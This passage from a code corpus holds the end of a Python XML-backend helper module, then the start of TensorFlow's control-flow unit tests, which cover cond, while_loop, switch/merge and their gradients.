return etree.tostring(element)
def register_namespace(self, prefix, namespace):
"""This is not necessary for lxml."""
pass
def _calc_impl_name(version, have_lxml=None):
if version < (2, 7):
if have_lxml:
return 'lxml'
return 'native'
return 'native'
def _create_impl(impl_name):
if impl_name == 'lxml':
return _LxmlImpl()
else:
return _NativeImpl()
def _check_have_lxml():
try:
from lxml import etree
return hasattr(etree, 'XML')
except ImportError:
return False
def _create_impl_for_system():
version = sys.version_info
if version < (2, 7):
have_lxml = _check_have_lxml()
else:
have_lxml = None
impl_name = _calc_impl_name(version, have_lxml=have_lxml)
return _create_impl(impl_name)
_impl = _create_impl_for_system()
def XML(raw_str):
"""Parse the XML string.
Raises ParseError if the raw_str could not be parsed.
"""
return _impl.XML(raw_str)
def SubElement(parent, tag, attrib={}, **extra):
"""See the SubElement() documentation from python xml or lxml."""
return _impl.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(element):
"""See the tostring() documentation from python xml or lxml."""
return _impl.tostring(element)
def register_namespace(prefix, namespace):
return _impl.register_namespace(prefix, namespace)
| apache-2.0 | -7,815,707,756,236,600,000 | 27.542484 | 78 | 0.650561 | false |
dhalleine/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 59408 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.python.framework import function
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import logging_ops
def check_op_order(graph):
"""Sanity check on the ordering of op id."""
for op in graph.get_operations():
for v in op.inputs:
assert v.op._id < op._id or op.type == "Merge", (
"The id of %s must be less than the id of %s" % (v.op.name, op.name))
return True
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def isum(s):
i = tf.constant(0, name="i")
c = lambda i, s: tf.less(i, 10)
b = lambda i, s: [tf.add(i, 1), tf.add(i, s)]
_, r_s = tf.while_loop(c, b, [i, s])
return r_s
class ControlFlowTest(tf.test.TestCase):
def testRefIdentity(self):
with self.test_session():
v = tf.Variable(7)
v = control_flow_ops._Identity(v)
op = tf.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(check_op_order(v.graph))
self.assertTrue(isinstance(v2, tf.Tensor))
tf.initialize_all_variables().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.test_session():
v = tf.Variable(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = tf.constant(9)
enter_nine = control_flow_ops.enter(nine, "foo_1")
op = tf.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
tf.initialize_all_variables().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.test_session():
v = tf.Variable(7)
p = tf.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v.ref(), p)
v2 = tf.assign(v1[1], 9)
tf.initialize_all_variables().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = control_flow_ops.enter(data, "foo_1", False)
five = tf.constant(5)
enter_five = control_flow_ops.enter(five, "foo_1", False)
mul_op = tf.mul(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeIndexedSlices(self):
with self.test_session():
values = tf.constant([1, 2, 3, 4, 5, 6])
indices = tf.constant([0, 2, 4, 6, 8, 10])
data = tf.IndexedSlices(values, indices)
pred = tf.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = tf.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
lambda e: "The tensor returned for" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
zero = tf.convert_to_tensor(0)
one = tf.convert_to_tensor(1)
less_op = tf.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = tf.constant(1)
add_op = tf.add(switch_op[0], one)
id_op = tf.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = tf.constant(1)
add_op = tf.add(switch_op[0], one)
five = tf.constant(5)
mul_op = tf.mul(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.test_session():
false = tf.convert_to_tensor(False)
n = tf.constant(10)
enter_false = control_flow_ops.enter(false, "foo_1", False)
enter_n = control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.test_session():
zero = tf.constant(0)
one = tf.constant(1)
n = tf.constant(10)
enter_i = control_flow_ops.enter(zero, "foo", False)
enter_one = control_flow_ops.enter(one, "foo", True)
enter_n = control_flow_ops.enter(n, "foo", True)
with tf.device("/gpu:0"):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = tf.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = tf.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.test_session():
zero = tf.constant(0)
one = tf.constant(1)
n = tf.constant(10)
enter_i = control_flow_ops.enter(zero, "foo", False)
enter_one = control_flow_ops.enter(one, "foo", True)
enter_n = control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = tf.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = tf.add(switch_i[1], enter_one)
with tf.device("/gpu:0"):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testCondBool(self):
values = tf.constant(10)
fn1 = lambda: tf.add(values, 1)
fn2 = lambda: tf.sub(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = tf.cond(False, fn1, fn2)
def testCondIndexedSlices(self):
with self.test_session():
values = tf.constant(10)
indices = tf.constant(0)
x = tf.IndexedSlices(values, indices)
pred = tf.less(1, 2)
fn1 = lambda: tf.IndexedSlices(tf.add(x.values, 1), indices)
fn2 = lambda: tf.IndexedSlices(tf.sub(x.values, 1), indices)
r = tf.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertTrue(check_op_order(x.values.graph))
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
def testCondIndexedSlicesDifferentTypes(self):
with self.test_session():
values = tf.constant(10)
i_32 = tf.convert_to_tensor(0, name="one", dtype=tf.int32)
i_64 = tf.convert_to_tensor(0, name="one", dtype=tf.int64)
x = tf.IndexedSlices(values, i_32)
pred = tf.less(1, 2)
fn1 = lambda: tf.IndexedSlices(tf.add(x.values, 1), i_32)
fn2 = lambda: tf.IndexedSlices(tf.sub(x.values, 1), i_64)
r = tf.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertTrue(check_op_order(x.values.graph))
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with tf.device("/cpu:0"):
v = tf.Variable(7.0)
x = tf.constant(10.0)
pred = tf.less(1.0, 2.0)
fn1 = lambda: tf.add(v, 1.0)
fn2 = lambda: tf.sub(x, 1.0)
r = tf.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = tf.constant(10)
pred = tf.less(1, 2)
fn1 = lambda: tf.add(x, 1)
fn2 = lambda: tf.sub(x, 1)
r = tf.cond(pred, fn1, fn2)
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.test_session():
x = tf.constant(10)
r = tf.cond(tf.less(1, 0), lambda: tf.add(x, 1), lambda: tf.sub(x, 1))
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(9, result)
def testCond_3(self):
with self.test_session():
x = tf.constant(10)
pred = tf.less(1, 2)
fn1 = lambda: tf.add(x, 1)
fn2 = lambda: tf.sub(x, 1)
fn3 = lambda: tf.add(tf.cond(pred, fn1, fn2), 1)
r = tf.cond(pred, fn3, fn2)
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(12, result)
def testCond_4(self):
with self.test_session():
v1 = tf.Variable(7)
v2 = tf.Variable(7)
v3 = tf.Variable(7)
age = tf.constant(3)
max_age = tf.constant(2)
pred = tf.greater(age, max_age)
fn1 = lambda: [tf.assign(v1, 1).op, tf.assign(v2, 2).op]
fn2 = lambda: [tf.assign(v3, 3).op, tf.constant(10).op]
r = tf.cond(pred, fn1, fn2)
tf.initialize_all_variables().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertTrue(check_op_order(age.graph))
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.test_session():
alive = tf.constant(True, name="alive")
count = tf.constant(0, name="count")
def body(i):
return tf.cond(
alive, lambda: [tf.less(i, 3), tf.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
with self.test_session():
v1 = tf.Variable([7])
age = tf.constant(3)
pred = tf.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = tf.cond(pred, fn1, fn2)
tf.initialize_all_variables().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.test_session() as sess:
x = tf.constant(10)
y = tf.constant(200)
pred = tf.less(1, 2)
fn1 = lambda: [tf.add(x, 1), tf.add(x, 2)]
fn2 = lambda: [y, y]
r = tf.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondGrad_1(self):
with self.test_session():
x = tf.constant(10.0, name="x")
pred = tf.less(1, 2)
fn1 = lambda: tf.identity(x)
fn2 = lambda: tf.identity(x)
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [x])[0]
result = grad.eval()
self.assertAllEqual(1.0, result)
def testCondGrad_2(self):
with self.test_session():
c = tf.placeholder(tf.int32, shape=[])
x = tf.constant(10.0)
pred = tf.less(c, 2)
fn1 = lambda: tf.mul(x, 42.0)
fn2 = lambda: tf.mul(x, 3.0)
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.test_session():
x = tf.constant(0., name="X")
y = tf.cond(tf.constant(True),
lambda: x,
lambda: tf.cond(x < 1., lambda: x, lambda: x))
result = tf.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = tf.cond(tf.constant(False),
lambda: x,
lambda: tf.cond(x < 1., lambda: x, lambda: x))
result = tf.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
def testCondGrad_Gather(self):
with self.test_session() as sess:
v1 = tf.Variable([1.0, 42.0])
c = tf.placeholder(tf.int32, shape=[])
pred = tf.less(c, 2)
fn1 = lambda: tf.identity(v1)
fn2 = lambda: tf.gather(v1, [1, 1])
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [v1])[0]
tf.initialize_all_variables().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 10,000 iterations took 0.21s.
def testWhile_1(self):
with self.test_session():
n = tf.constant(0)
c = lambda x: tf.less(x, 10000)
b = lambda x: tf.add(x, 1)
r = tf.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileWithRefs_1(self):
with self.test_session() as sess:
x = tf.Variable(0).ref()
i = tf.constant(0)
c = lambda i, x: tf.less(i, 100)
self.assertEqual(x.dtype, tf.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, tf.int32_ref)
return (i+1, gen_array_ops._ref_identity(x))
r = tf.while_loop(c, b, [i, x], parallel_iterations=5)
tf.initialize_all_variables().run()
self.assertEqual(r[0].dtype, tf.int32)
self.assertEqual(r[1].dtype, tf.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.test_session():
s = tf.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
def testWhile_3(self):
with self.test_session():
def compute(i, m, c, o):
m, c = [tf.add(m, 1), tf.add(c, 1)]
o = tf.add(o, m)
o = tf.add(o, c)
i = tf.add(i, 1)
return [i, m, c, o]
i = tf.convert_to_tensor(0)
m = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor(0)
d = tf.convert_to_tensor(100)
r = tf.while_loop(
lambda i, m, c, o: tf.less(i, d), compute, [i, m, c, o])
result = r[3].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.test_session():
def compute(i, m, c, o):
m, c = [tf.gather(x, i), tf.gather(x, i)]
o = tf.add(o, m)
o = tf.add(o, c)
i = tf.add(i, 1)
return [i, m, c, o]
i = tf.convert_to_tensor(0)
m = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor(0)
x = tf.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = tf.size(x)
r = tf.while_loop(
lambda i, m, c, o: tf.less(i, s), compute, [i, m, c, o])
result = r[3].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(42, result)
def testWhile_5(self):
with self.test_session():
def compute(i, c, o):
c = tf.slice(x, tf.expand_dims(i, 0), [1])
o = tf.concat(0, [o, c])
i = tf.add(i, 1)
return [i, c, o]
i = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor([0])
x = tf.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = tf.size(x)
r = tf.while_loop(
lambda i, c, o: tf.less(i, s), compute, [i, c, o])
result = r[2].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(1.0)
c = lambda x: tf.less(x, 10.0)
b = lambda x: tf.add(x, 1.0)
r = tf.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(1.0)
c = lambda x: tf.less(x, 10.0)
def b(x):
with tf.device("/cpu:0"):
return tf.add(x, 1.0)
r = tf.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def testWhileShape(self):
with self.test_session():
i = tf.constant(0)
m = tf.ones([2, 2])
c = lambda i, j: tf.less(i, 2)
def _b(i, j):
new_i = tf.add(i, 1)
new_j = tf.tile(j, [2, 2])
return [new_i, new_j]
r = tf.while_loop(c, _b, [i, m])
r = r[1] * tf.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
def testWhileShapeInference(self):
with self.test_session():
i = tf.constant(0)
m = tf.ones([2, 2])
c = lambda i, j: tf.less(i, 2)
def _b(i, j):
new_i = tf.add(i, 1)
new_j = tf.concat(0, [j, j])
return [new_i, new_j]
r = tf.while_loop(c, _b, [i, m])
self.assertTrue(r[1].get_shape()[0].value is None)
self.assertEqual(r[1].get_shape()[1], tf.Dimension(2))
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = tf.constant(0)
def cpu_sum(s):
c = lambda i, s: tf.less(i, 10)
def b(i, s):
i1 = tf.add(i, 1)
with tf.device("/cpu:0"):
s1 = tf.add(i, s)
return i1, s1
_, r_s = tf.while_loop(c, b, [n, s])
return r_s
c = lambda x: tf.less(x, 200)
b = lambda x: tf.add(x, cpu_sum(n))
r = tf.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def testWhileWithControl_1(self):
with self.test_session():
n = tf.constant(0)
r = tf.constant(0)
condition = lambda n_, r_: tf.less(n_, 10)
def body(n_, r_):
n_ = tf.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = tf.constant(12)
return [n_, r_]
res = tf.while_loop(condition, body, [n, r],
parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.test_session():
r = tf.constant(0)
condition = lambda r_: tf.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = tf.constant(12)
return [r_]
res = tf.while_loop(condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.test_session() as sess:
b = tf.placeholder(tf.bool)
c = tf.constant(0)
with tf.control_dependencies([b]):
c = tf.while_loop(lambda x: x < 10, lambda x: x + 1, [c])
self.assertEqual(10, sess.run(c, {b: True}))
def testCondWhile_1(self):
with self.test_session():
n = tf.convert_to_tensor(0, name="n")
c = lambda x: tf.less(x, 10)
b = lambda x: tf.add(x, 1)
r = tf.cond(tf.less(0, 1),
lambda: tf.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
with self.test_session():
n = tf.convert_to_tensor(0)
c = lambda x: tf.less(x, 10)
b = lambda x: tf.add(x, 1)
r = tf.cond(tf.less(1, 0), lambda: tf.add(n, 1),
lambda: tf.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def testWhileCond_1(self):
with self.test_session():
i = tf.convert_to_tensor(0, name="i")
n = tf.convert_to_tensor(10, name="n")
one = tf.convert_to_tensor(1, name="one")
c = lambda x: tf.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: tf.cond(
tf.constant(True), lambda: tf.add(x, one), lambda: tf.sub(x, one))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
with self.test_session():
n = tf.convert_to_tensor(0, name="n")
c = lambda x: tf.less(x, 10)
b = lambda x: tf.cond(tf.constant(True), lambda: tf.add(x, 1), lambda: n)
r = tf.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
with self.test_session():
n = tf.convert_to_tensor(0)
c = lambda x: tf.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: tf.cond(tf.less(0, 1), lambda: tf.add(x, 1),
lambda: tf.sub(x, 1))
# pylint: enable=undefined-variable
r = tf.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
def testWhileUpdateVariable_1(self):
with self.test_session():
select = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j):
return tf.less(j, 3)
def loop_body(j):
ns = tf.scatter_update(select, j, 10.0)
nj = tf.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = tf.while_loop(loop_iterator, loop_body, [n],
parallel_iterations=1)
self.assertTrue(check_op_order(n.graph))
tf.initialize_all_variables().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
def testWhileUpdateVariable_2(self):
with self.test_session():
select1 = tf.Variable([3.0, 4.0, 5.0])
select2 = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j):
return tf.less(j, 3)
def loop_body(j):
ns1 = tf.scatter_update(select1, j, 10.0)
ns2 = tf.scatter_update(select2, j, 10.0)
nj = tf.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = tf.while_loop(loop_iterator, loop_body, [n],
parallel_iterations=1)
self.assertTrue(check_op_order(n.graph))
tf.initialize_all_variables().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
def testWhileUpdateVariable_3(self):
with self.test_session():
select = tf.Variable([3.0, 4.0, 5.0])
n = tf.constant(0)
def loop_iterator(j, _):
return tf.less(j, 3)
def loop_body(j, _):
ns = tf.scatter_update(select, j, 10.0)
nj = tf.add(j, 1)
return [nj, ns]
r = tf.while_loop(loop_iterator, loop_body,
[n, tf.identity(select)],
parallel_iterations=1)
tf.initialize_all_variables().run()
result = r[1].eval()
self.assertTrue(check_op_order(n.graph))
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
# b/24814703
def testWhileUpdateVariable_4(self):
with self.test_session():
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
tf.initialize_all_variables().run()
c = tf.constant(0, name="c")
asn1 = tf.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return tf.less(i, 10)
# Loop body
def loop_body(i):
asn2 = tf.assign_add(var_b, asn1, name="b_add")
with tf.control_dependencies([asn2]):
ni = tf.add(i, 1, name="i_add")
return ni
lpa = tf.while_loop(pred, loop_body, [c],
parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_b.eval())
# b/24736492
def testWhileUpdateVariable_5(self):
with self.test_session():
# Create some variables.
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
tf.initialize_all_variables().run()
# Change condition to check var_b
def pred(_):
return tf.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = tf.assign_add(var_a, tf.constant(1), name="a_add")
asn2 = tf.assign_add(var_b, tf.constant(1), name="b_add")
with tf.control_dependencies([asn1, asn2]):
inc_b = tf.identity(var_b)
return inc_b
lpa = tf.while_loop(pred, loop_body, [var_b], 1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
# b/24814668
def testWhileUpdateVariable_6(self):
with self.test_session():
# Create some variables.
var_a = tf.Variable(0, name="a")
var_b = tf.Variable(0, name="b")
c = tf.constant(0)
tf.initialize_all_variables().run()
# Loop condition
def pred(i):
return tf.less(i, 10)
# Loop body
def loop_body(i):
asn1 = tf.assign_add(var_a, 1, name="a_add")
with tf.control_dependencies([asn1]):
asn2 = tf.assign_add(var_b, var_a, name="b_add")
with tf.control_dependencies([asn2]):
ni = tf.add(i, 1, name="i_add")
return ni
lpa = tf.while_loop(pred, loop_body, [c], 1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
def testWhileQueue_1(self):
with self.test_session():
q = tf.FIFOQueue(-1, tf.int32)
i = tf.constant(0)
def c(i):
return tf.less(i, 10)
def b(i):
ni = tf.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = tf.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
def testWhileStack_1(self):
with self.test_session():
s = gen_data_flow_ops._stack(tf.int32, stack_name="foo")
i = tf.constant(0)
def c(i):
return tf.less(i, 10)
def b(i):
ni = tf.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops._stack_push(s, i)], ni)
return ni
r = tf.while_loop(c, b, [i], parallel_iterations=1)
x = tf.constant(0)
def c1(i, _):
return tf.greater(i, 0)
def b1(i, x):
ni = tf.sub(i, 1)
nx = x + gen_data_flow_ops._stack_pop(s, tf.int32)
return [ni, nx]
_, rx = tf.while_loop(c1, b1, [r, x], parallel_iterations=1)
self.assertEqual(45, rx.eval())
def testWhileGrad_Square(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(tf.less(1, 2), lambda: r, lambda: v)
r = tf.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileGrad_Shape(self):
with self.test_session():
x = tf.placeholder(tf.float32, shape=[None])
v = tf.constant([2.0], name="v")
n = tf.constant(0, name="n")
c = lambda i, v: tf.less(i, 5)
b = lambda i, v: [i + 1, tf.mul(x, v)]
r = tf.while_loop(c, b, [n, v], parallel_iterations=1)
r = tf.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_MultipleUses(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.mul(r, r)
r = tf.gradients(r, v)[0]
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.test_session():
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = tf.square
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.add(r, r)
r = tf.gradients(r, v)[0]
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = tf.constant(3.0, name="a")
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = lambda v: tf.mul(v, a)
r = tf.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = tf.gradients(r, [a, v])
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def testWhileGrad_Variable(self):
with self.test_session():
a = tf.Variable(3.0)
v = tf.constant(2.0, name="v")
c = lambda v: tf.less(v, 100.0)
b = lambda v: tf.mul(v, a)
r = tf.while_loop(c, b, [v], parallel_iterations=1)
r = tf.gradients(r, a)
